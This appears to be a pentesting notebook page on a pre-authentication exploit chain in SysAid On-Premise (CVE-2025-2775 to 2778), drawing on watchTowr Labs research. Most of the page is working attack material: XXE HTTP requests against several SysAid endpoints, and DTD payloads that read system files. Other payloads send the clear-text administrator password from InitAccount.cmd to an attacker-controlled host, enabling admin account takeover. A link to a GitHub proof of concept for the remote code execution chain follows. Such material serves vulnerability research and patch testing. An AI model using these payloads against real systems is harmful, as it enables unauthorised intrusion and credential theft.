SysAid

SysAid Exploit

CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778

SysOwned, Your Friendly Support Ticket - SysAid On-Premise Pre-Auth RCE Chain (CVE-2025-2775 And Friends)watchTowr Labs

Pre-auth RCE - SysAid ≥ 23.3.40

Multiples Pre-Auth XXE

POST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

POST /mdm/serveurl HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

Exfiltration

exif.dtd:

<!ENTITY % d SYSTEM "file:///C:\\windows\\win.ini">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://192.168.8.107/?e=%d;'>">

POST /mdm/serverurl HTTP/1.1
Host: 192.168.8.162:8080
Content-Length: 119

<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://192.168.8.107/exfil.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>

Admin Account Takover

C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd

This file is created during installation by SysAid and contains the clear-text password of the main administrator in its first line.

dtd

<!ENTITY % d SYSTEM "file:///C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://192.168.8.107/?e=%d;'>">

POST /mdm/serverurl HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 121

<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://192.168.8.107/exfil.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>

RCE

GitHub - watchtowrlabs/watchTowr-vs-SysAid-PreAuth-RCE-Chain: PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)GitHub

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousSynology NextTeamViewer

Last updated 23 hours ago